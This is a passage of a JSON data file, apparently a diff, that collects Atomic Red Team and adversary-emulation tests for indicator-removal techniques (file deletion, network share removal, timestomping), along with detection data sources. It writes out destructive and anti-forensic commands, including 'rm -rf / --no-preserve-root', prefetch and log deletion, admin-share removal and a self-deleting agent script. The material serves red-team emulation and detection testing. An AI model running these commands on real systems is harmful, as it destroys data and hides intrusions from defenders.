#{file_to_shred}\n", + "name": "sh" + } + }, + { + "name": "Delete a single file - Windows cmd", + "auto_generated_guid": "861ea0b4-708a-4d17-848d-186c9c7f17e3", + "description": "Delete a single file from the temporary directory using cmd.exe.\nUpon execution, no output will be displayed. Use File Explorer to verify the file was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_delete": { + "description": "File to delete. Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "%temp%\\deleteme_T1551.004" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "The file to delete must exist on disk at specified location (#{file_to_delete})\n", + "prereq_command": "IF EXIST \"#{file_to_delete}\" ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "echo deleteme_T1551.004 >> #{file_to_delete}\n" + } + ], + "executor": { + "command": "del /f #{file_to_delete}\n", + "name": "command_prompt" + } + }, + { + "name": "Delete an entire folder - Windows cmd", + "auto_generated_guid": "ded937c4-2add-42f7-9c2c-c742b7a98698", + "description": "Recursively delete a folder in the temporary directory using cmd.exe.\nUpon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "folder_to_delete": { + "description": "Folder to delete. Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "%temp%\\deleteme_T1551.004" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "The file to delete must exist on disk at specified location (#{folder_to_delete})\n", + "prereq_command": "IF EXIST \"#{folder_to_delete}\" ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "mkdir #{folder_to_delete}\n" + } + ], + "executor": { + "command": "rmdir /s /q #{folder_to_delete}\n", + "name": "command_prompt" + } + }, + { + "name": "Delete a single file - Windows PowerShell", + "auto_generated_guid": "9dee89bd-9a98-4c4f-9e2d-4256690b0e72", + "description": "Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_delete": { + "description": "File to delete. Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "$env:TEMP\\deleteme_T1551.004" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The file to delete must exist on disk at specified location (#{file_to_delete})\n", + "prereq_command": "if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{file_to_delete} | Out-Null\n" + } + ], + "executor": { + "command": "Remove-Item -path #{file_to_delete}\n", + "name": "powershell" + } + }, + { + "name": "Delete an entire folder - Windows PowerShell", + "auto_generated_guid": "edd779e4-a509-4cba-8dfa-a112543dbfb1", + "description": "Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "folder_to_delete": { + "description": "Folder to delete. Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "$env:TEMP\\deleteme_folder_T1551.004" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The folder to delete must exist on disk at specified location (#{folder_to_delete})\n", + "prereq_command": "if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{folder_to_delete} -Type Directory | Out-Null\n" + } + ], + "executor": { + "command": "Remove-Item -Path #{folder_to_delete} -Recurse\n", + "name": "powershell" + } + }, + { + "name": "Delete Filesystem - Linux", + "auto_generated_guid": "f3aa95fe-4f10-4485-ad26-abf22a764c52", + "description": "This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "rm -rf / --no-preserve-root > /dev/null 2> /dev/null\n", + "name": "bash" + } + }, + { + "name": "Delete Prefetch File", + "auto_generated_guid": "36f96049-0ad7-4a5f-8418-460acaeb92fb", + "description": "Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run \"(Get-ChildItem -Path \"$Env:SystemRoot\\prefetch\\*.pf\" | Measure-Object).Count\"\nbefore and after the test to verify that the number of prefetch files decreases by 1.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Remove-Item -Path (Join-Path \"$Env:SystemRoot\\prefetch\\\" (Get-ChildItem -Path \"$Env:SystemRoot\\prefetch\\*.pf\" -Name)[0])\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Delete TeamViewer Log Files", + "auto_generated_guid": "69f50a5f-967c-4327-a5bb-e1a9a9983785", + "description": "Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.\nThis test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer\nlog file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.\n\nhttps://twitter.com/SBousseaden/status/1197524463304290305?s=20\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "teamviewer_log_file": { + "description": "Teamviewer log file to delete. Run the prereq command to create it if it does not exist.", + "type": "String", + "default": "$env:TEMP\\TeamViewer_54.log" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The folder to delete must exist on disk at specified location (#{teamviewer_log_file})\n", + "prereq_command": "if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{teamviewer_log_file} | Out-Null\n" + } + ], + "executor": { + "command": "Remove-Item #{teamviewer_log_file}\n", + "name": "powershell" + } + } + ] + }, + { + "id": "4cd4eb44-29a7-4259-91ae-e457b283a880", + "name": "Delete payload", + "description": "Remove a downloaded payload file", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1070.004", + "name": "Indicator Removal on Host: File Deletion" + }, + "platforms": { + "darwin": { + "sh": { + "cleanup": "rm #{payload}\n" + } + }, + "linux": { + "sh": { + "cleanup": "rm #{payload}\n" + } + }, + "windows": { + "psh,pwsh": { + "cleanup": "Remove-Item -Force -Path \"#{payload}\"" + } + } + } + }, + { + "id": "5f844ac9-5f24-4196-a70d-17f0bd44a934", + "name": "Deadman - Delete agent file", + "description": "Deadman ability to delete agent file after termination.", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1070.004", + "name": "Indicator Removal on Host: File Deletion" + }, + "platforms": { + "windows": { + "psh": { + "command": "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n" + } + }, + "darwin": { + "sh": { + "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;\n" + } + }, + "linux": { + "sh": { + "command": "path=\"$(pwd)/#{exe_name}\";\nnum_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep \"$path\"; done | wc -l);\nif [ \"$num_processes\" -le 1 ]; then /bin/rm -f \"$path\"; fi;" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1070.005", + "command_list": [ + "net use c: \\\\test\\share\nnet share test=\\\\test\\share /REMARK:\"test share\" /CACHE:No\n", + "net share \\\\test\\share /delete\n", + "Remove-SmbShare -Name \\\\test\\share\nRemove-FileShare -Name \\\\test\\share\n", + "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareServer /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareWks /t REG_DWORD /d 0 /f\n", + "for %i in (C$ IPC$ ADMIN$) do net share %i /delete" + ], + "commands": [ + { + "command": "net use c: \\\\test\\share\nnet share test=\\\\test\\share /REMARK:\"test share\" /CACHE:No\n", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + }, + { + "command": "net share \\\\test\\share /delete\n", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + }, + { + "command": "Remove-SmbShare -Name \\\\test\\share\nRemove-FileShare -Name \\\\test\\share\n", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + }, + { + "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareServer /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareWks /t REG_DWORD /d 0 /f\n", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + }, + { + "command": "for %i in (C$ IPC$ ADMIN$) do net share %i /delete", + "source": "atomics/T1070.005/T1070.005.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Network Share Connection Removal" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.005", + "display_name": "Indicator Removal on Host: Network Share Connection Removal", + "atomic_tests": [ + { + "name": "Add Network Share", + "auto_generated_guid": "14c38f32-6509-46d8-ab43-d53e32d2b131", + "description": "Add a Network Share utilizing the command_prompt\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "share_name": { + "description": "Share to add.", + "type": "String", + "default": "\\\\test\\share" + } + }, + "executor": { + "command": "net use c: #{share_name}\nnet share test=#{share_name} /REMARK:\"test share\" /CACHE:No\n", + "name": "command_prompt" + } + }, + { + "name": "Remove Network Share", + "auto_generated_guid": "09210ad5-1ef2-4077-9ad3-7351e13e9222", + "description": "Removes a Network Share utilizing the command_prompt\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "share_name": { + "description": "Share to remove.", + "type": "String", + "default": "\\\\test\\share" + } + }, + "executor": { + "command": "net share #{share_name} /delete\n", + "name": "command_prompt" + } + }, + { + "name": "Remove Network Share PowerShell", + "auto_generated_guid": "0512d214-9512-4d22-bde7-f37e058259b3", + "description": "Removes a Network Share utilizing PowerShell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "share_name": { + "description": "Share to remove.", + "type": "String", + "default": "\\\\test\\share" + } + }, + "executor": { + "command": "Remove-SmbShare -Name #{share_name}\nRemove-FileShare -Name #{share_name}\n", + "name": "powershell" + } + }, + { + "name": "Disable Administrative Share Creation at Startup", + "auto_generated_guid": "99c657aa-ebeb-4179-a665-69288fdd12b8", + "description": "Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators \nremote access to every disk volume on a network-connected system. These shares are automatically created at started unless they have been\npurposefully disabled and is done in this Atomic test. As Microsoft puts it, \"Missing administrative shares typically \nindicate that the computer in question has been compromised by malicious software.\"\nhttps://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareServer /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareWks /t REG_DWORD /d 0 /f\n", + "cleanup_command": "reg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareServer /f\nreg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" /v AutoShareWks /f\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Remove Administrative Shares", + "auto_generated_guid": "4299eff5-90f1-4446-b2f3-7f4f5cfd5d62", + "description": "Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators \nremote access to every disk volume on a network-connected system. As Microsoft puts it, \u201cMissing administrative shares typically \nindicate that the computer in question has been compromised by malicious software.\nhttps://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "for %i in (C$ IPC$ ADMIN$) do net share %i /delete", + "cleanup_command": "net share ADMIN$ /UNLIMITED >nul 2>&1\nnet share C$=C:\\ >nul 2>&1\nnet share IPC$ >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1070.006", + "command_list": [ + "touch -a -t 197001010000.00 /opt/filename\n", + "touch -m -t 197001010000.00 /opt/filename\n", + "NOW=$(date)\ndate -s \"1970-01-01 00:00:00\"\ntouch /opt/filename\ndate -s \"$NOW\"\nstat /opt/filename\n", + "touch -acmr #{reference_file_path} /opt/filename\n", + "touch -acmr /bin/sh #{target_file_path}\n", + "Get-ChildItem #{file_path} | % { $_.CreationTime = \"01/01/1970 00:00:00\" }\n", + "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.CreationTime = \"#{target_date_time}\" }\n", + "Get-ChildItem #{file_path} | % { $_.LastWriteTime = \"01/01/1970 00:00:00\" }\n", + "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastWriteTime = \"#{target_date_time}\" }\n", + "Get-ChildItem #{file_path} | % { $_.LastAccessTime = \"01/01/1970 00:00:00\" }\n", + "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastAccessTime = \"#{target_date_time}\" }\n", + "import-module $env:appdata\\Microsoft\\timestomp.ps1\ntimestomp -dest \"$env:appdata\\Microsoft\\kxwn.lock\"\n" + ], + "commands": [ + { + "command": "touch -a -t 197001010000.00 /opt/filename\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "touch -m -t 197001010000.00 /opt/filename\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "NOW=$(date)\ndate -s \"1970-01-01 00:00:00\"\ntouch /opt/filename\ndate -s \"$NOW\"\nstat /opt/filename\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "touch -acmr #{reference_file_path} /opt/filename\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "touch -acmr /bin/sh #{target_file_path}\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem #{file_path} | % { $_.CreationTime = \"01/01/1970 00:00:00\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.CreationTime = \"#{target_date_time}\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem #{file_path} | % { $_.LastWriteTime = \"01/01/1970 00:00:00\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastWriteTime = \"#{target_date_time}\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem #{file_path} | % { $_.LastAccessTime = \"01/01/1970 00:00:00\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "Get-ChildItem $env:TEMP\\T1551.006_timestomp.txt | % { $_.LastAccessTime = \"#{target_date_time}\" }\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + }, + { + "command": "import-module $env:appdata\\Microsoft\\timestomp.ps1\ntimestomp -dest \"$env:appdata\\Microsoft\\kxwn.lock\"\n", + "source": "atomics/T1070.006/T1070.006.yaml", + "name": "Atomic Red Team Test - Indicator Removal on Host: Timestomp" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1070.006", + "display_name": "Indicator Removal on Host: Timestomp", + "atomic_tests": [ + { + "name": "Set a file's access timestamp", + "auto_generated_guid": "5f9113d5-ed75-47ed-ba23-ea3573d05810", + "description": "Stomps on the access timestamp of a file\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "target_filename": { + "description": "Path of file that we are going to stomp on last access time", + "type": "Path", + "default": "/opt/filename" + } + }, + "executor": { + "command": "touch -a -t 197001010000.00 #{target_filename}\n", + "name": "sh" + } + }, + { + "name": "Set a file's modification timestamp", + "auto_generated_guid": "20ef1523-8758-4898-b5a2-d026cc3d2c52", + "description": "Stomps on the modification timestamp of a file\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "target_filename": { + "description": "Path of file that we are going to stomp on last access time", + "type": "Path", + "default": "/opt/filename" + } + }, + "executor": { + "command": "touch -m -t 197001010000.00 #{target_filename}\n", + "name": "sh" + } + }, + { + "name": "Set a file's creation timestamp", + "auto_generated_guid": "8164a4a6-f99c-4661-ac4f-80f5e4e78d2b", + "description": "Stomps on the create timestamp of a file\n\nSetting the creation timestamp requires changing the system clock and reverting.\nSudo or root privileges are required to change date. Use with caution.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "target_filename": { + "description": "Path of file that we are going to stomp on last access time", + "type": "Path", + "default": "/opt/filename" + } + }, + "executor": { + "command": "NOW=$(date)\ndate -s \"1970-01-01 00:00:00\"\ntouch #{target_filename}\ndate -s \"$NOW\"\nstat #{target_filename}\n", + "name": "sh" + } + }, + { + "name": "Modify file timestamps using reference file", + "auto_generated_guid": "631ea661-d661-44b0-abdb-7a7f3fc08e50", + "description": "Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file.\n\nThis technique was used by the threat actor Rocke during the compromise of Linux web servers.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "target_file_path": { + "description": "Path of file to modify timestamps of", + "type": "Path", + "default": "/opt/filename" + }, + "reference_file_path": { + "description": "Path of reference file to read timestamps from", + "type": "Path", + "default": "/bin/sh" + } + }, + "executor": { + "command": "touch -acmr #{reference_file_path} #{target_file_path}\n", + "name": "sh" + } + }, + { + "name": "Windows - Modify file creation timestamp with PowerShell", + "auto_generated_guid": 